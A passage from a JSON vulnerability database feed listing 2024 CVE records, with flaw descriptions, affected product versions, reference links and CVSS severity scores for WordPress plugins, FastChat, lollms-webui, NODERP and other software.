"17.5.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "14.3.0", "versionEndExcluding" : "17.4.6", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-12-12T12:15Z", "lastModifiedDate" : "2025-07-11T20:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10044", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/44633540-377d-4ac4-b3a3-c2d0fa19d0e6", "name" : "https://huntr.com/bounties/44633540-377d-4ac4-b3a3-c2d0fa19d0e6", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Server-Side Request Forgery (SSRF) vulnerability exists in the POST /worker_generate_stream API endpoint of the Controller API Server in lm-sys/fastchat, as of commit e208d5677c6837d590b81cb03847c0b9de100765. This vulnerability allows attackers to exploit the victim controller API server's credentials to perform unauthorized web actions or access unauthorized web resources by combining it with the POST /register_worker endpoint." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lm-sys:fastchat:2024-09-23:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-12-30T12:15Z", "lastModifiedDate" : "2025-07-29T23:26Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10045", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/03b8b5a2-979d-42d0-86f5-48ee73162d22?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/03b8b5a2-979d-42d0-86f5-48ee73162d22?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/transients-manager/trunk/src/TransientsManager.php#L993", "name" : "https://plugins.trac.wordpress.org/browser/transients-manager/trunk/src/TransientsManager.php#L993", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3171619/transients-manager/trunk/src/TransientsManager.php", "name" : "https://plugins.trac.wordpress.org/changeset/3171619/transients-manager/trunk/src/TransientsManager.php", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Transients Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on the process_actions function. This makes it possible for unauthenticated attackers to delete transients via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpbeginner:transients_manager:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.0.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-23T08:15Z", "lastModifiedDate" : "2024-10-25T18:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10046", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/persian-woocommerce-sms/tags/7.0.3/src/SMS/Archive.php#L93", "name" : "https://plugins.trac.wordpress.org/browser/persian-woocommerce-sms/tags/7.0.3/src/SMS/Archive.php#L93", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3201912/", "name" : "https://plugins.trac.wordpress.org/changeset/3201912/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/175a69da-c47a-40f3-98c7-7cfcdf98f9f6?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/175a69da-c47a-40f3-98c7-7cfcdf98f9f6?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ?????? ????? ??????? Persian WooCommerce SMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 7.0.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-12-07T02:15Z", "lastModifiedDate" : "2024-12-07T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10047", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-36" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/69c3a27c-bd93-4aff-a46b-56798f28a3ce", "name" : "https://huntr.com/bounties/69c3a27c-bd93-4aff-a46b-56798f28a3ce", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "parisneo/lollms-webui versions v9.9 to the latest are vulnerable to a directory listing vulnerability. An attacker can list arbitrary directories on a Windows system by sending a specially crafted HTTP request to the /open_file endpoint." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lollms:lollms_web_ui:9.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-07-08T16:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10048", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/90220c8d-8efc-48a2-955c-3155598f5f19?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/90220c8d-8efc-48a2-955c-3155598f5f19?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3174969/post-status-notifier-lite/tags/1.11.7/lib/Psn/Admin/ListTable/Rules.php", "name" : "https://plugins.trac.wordpress.org/changeset/3174969/post-status-notifier-lite/tags/1.11.7/lib/Psn/Admin/ListTable/Rules.php", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Post Status Notifier Lite and Premium plugins for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 1.11.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-29T09:15Z", "lastModifiedDate" : "2024-10-29T14:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10049", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3704b365-cbdf-4c74-9619-59f0a10e3c6a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3704b365-cbdf-4c74-9619-59f0a10e3c6a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/woo-edit-templates/trunk/includes/list-table-theme-templates.php#L87", "name" : "https://plugins.trac.wordpress.org/browser/woo-edit-templates/trunk/includes/list-table-theme-templates.php#L87", "refsource" : "", "tags" : [ "Broken Link" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Edit WooCommerce Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘page’ parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:edit_woocommerce_templates_project:edit_woocommerce_templates:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.1.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-18T05:15Z", "lastModifiedDate" : "2024-10-29T14:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1005", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/M9ERphWTXUPj", "name" : "https://note.zhaoj.in/share/M9ERphWTXUPj", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252274", "name" : "https://vuldb.com/?ctiid.252274", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252274", "name" : "https://vuldb.com/?id.252274", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://note.zhaoj.in/share/M9ERphWTXUPj", "name" : "https://note.zhaoj.in/share/M9ERphWTXUPj", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?id.252274", "name" : "https://vuldb.com/?id.252274", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252274", "name" : "https://vuldb.com/?ctiid.252274", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This vulnerability affects unknown code of the file /runtime/log. The manipulation leads to files or directories accessible. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252274 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:shanxi_tianneng_technology:noderp:*:*:*:*:*:*:*:*", "versionEndExcluding" : "6.0.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-29T15:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10050", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/662f6ae2-2047-4bbf-b4a6-2d536051e389?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/662f6ae2-2047-4bbf-b4a6-2d536051e389?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/1.6.43/inc/class-header-footer-elementor.php#L634", "name" : "https://plugins.trac.wordpress.org/browser/header-footer-elementor/tags/1.6.43/inc/class-header-footer-elementor.php#L634", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3173344/header-footer-elementor/trunk/inc/class-header-footer-elementor.php?contextall=1", "name" : "https://plugins.trac.wordpress.org/changeset/3173344/header-footer-elementor/trunk/inc/class-header-footer-elementor.php?contextall=1", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 1.6.43 via the hfe_template shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to view the contents of Draft, Private and Password-protected posts they do not own." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:brainstormforce:elementor_header_\\&_footer_builder:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.6.44", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-24T09:15Z", "lastModifiedDate" : "2025-01-29T17:00Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10051", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-400" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/6db72368-e7bc-43ee-a4ae-6092f710c263", "name" : "https://huntr.com/bounties/6db72368-e7bc-43ee-a4ae-6092f710c263", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Realchar version v0.0.4 is vulnerable to an unauthenticated denial of service (DoS) attack. The vulnerability exists in the file upload request handling, where appending characters, such as dashes (-), to the end of a multipart boundary in an HTTP request causes the server to continuously process each character. This leads to excessive resource consumption and renders the service unavailable. The issue is unauthenticated and does not require any user interaction, impacting all users of the service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-20T10:15Z", "lastModifiedDate" : "2025-03-20T10:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10054", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/5a9fd64b-3207-4acb-92ff-1cca08c41ac9/", "name" : "https://wpscan.com/vulnerability/5a9fd64b-3207-4acb-92ff-1cca08c41ac9/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/5a9fd64b-3207-4acb-92ff-1cca08c41ac9/", "name" : "https://wpscan.com/vulnerability/5a9fd64b-3207-4acb-92ff-1cca08c41ac9/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Happyforms WordPress plugin before 1.26.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:happyforms:happyforms:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.26.3", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-05-15T20:15Z", "lastModifiedDate" : "2025-06-04T20:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10055", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c13600-0791-4ade-9c28-f43f164aedae?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c13600-0791-4ade-9c28-f43f164aedae?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/support-chat/#developers", "name" : "https://wordpress.org/plugins/support-chat/#developers", "refsource" : "", "tags" : [ "Product", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3169768/", "name" : "https://plugins.trac.wordpress.org/changeset/3169768/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Click to Chat – WP Support All-in-One Floating Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpsaio_snapchat shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ninjateam:click_to_chat:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.3.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-18T08:15Z", "lastModifiedDate" : "2024-10-22T16:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10056", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3200766/", "name" : "https://plugins.trac.wordpress.org/changeset/3200766/", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/contact-form-with-a-meeting-scheduler-by-vcita/#developers", "name" : "https://wordpress.org/plugins/contact-form-with-a-meeting-scheduler-by-vcita/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5d1b419c-2276-415d-8c54-15da9125c442?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/5d1b419c-2276-415d-8c54-15da9125c442?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Contact Form Builder by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's livesite-pay shortcode in all versions up to, and including, 4.10.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-12-05T10:31Z", "lastModifiedDate" : "2024-12-05T10:31Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10057", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b77ea258-dced-4c36-bd0d-8977a347d1c9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b77ea258-dced-4c36-bd0d-8977a347d1c9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/rss-feed-widget/#developers", "name" : "https://wordpress.org/plugins/rss-feed-widget/#developers", "refsource" : "", "tags" : [ "Product", "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3170773/", "name" : "https://plugins.trac.wordpress.org/changeset/3170773/", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The RSS Feed Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rfw-youtube-videos shortcode in all versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fahadmahmood:rss_feed_widget:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.0.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-18T10:15Z", "lastModifiedDate" : "2024-10-21T20:53Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1006", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/vWuVlU2eg79t", "name" : "https://note.zhaoj.in/share/vWuVlU2eg79t", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252275", "name" : "https://vuldb.com/?ctiid.252275", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252275", "name" : "https://vuldb.com/?id.252275", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://note.zhaoj.in/share/vWuVlU2eg79t", "name" : "https://note.zhaoj.in/share/vWuVlU2eg79t", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?id.252275", "name" : "https://vuldb.com/?id.252275", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252275", "name" : "https://vuldb.com/?ctiid.252275", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This issue affects some unknown processing of the file application/index/common.php of the component Cookie Handler. The manipulation of the argument Nod_User_Id/Nod_User_Token leads to improper authentication. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252275. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:shanxi_tianneng_technology:noderp:*:*:*:*:*:*:*:*", "versionEndExcluding" : "6.0.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-29T16:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10068", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.280716", "name" : "VDB-280716 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?id.280716", "name" : "VDB-280716 | OpenSight Software FlashFXP FlashFXP.exe uncontrolled search path", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?submit.419684", "name" : "Submit #419684 | OpenSight Software LLC FlashFXP 5.4.0.3970 DLL Hijacking", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in OpenSight Software FlashFXP 5.4.0.3970. It has been classified as critical. 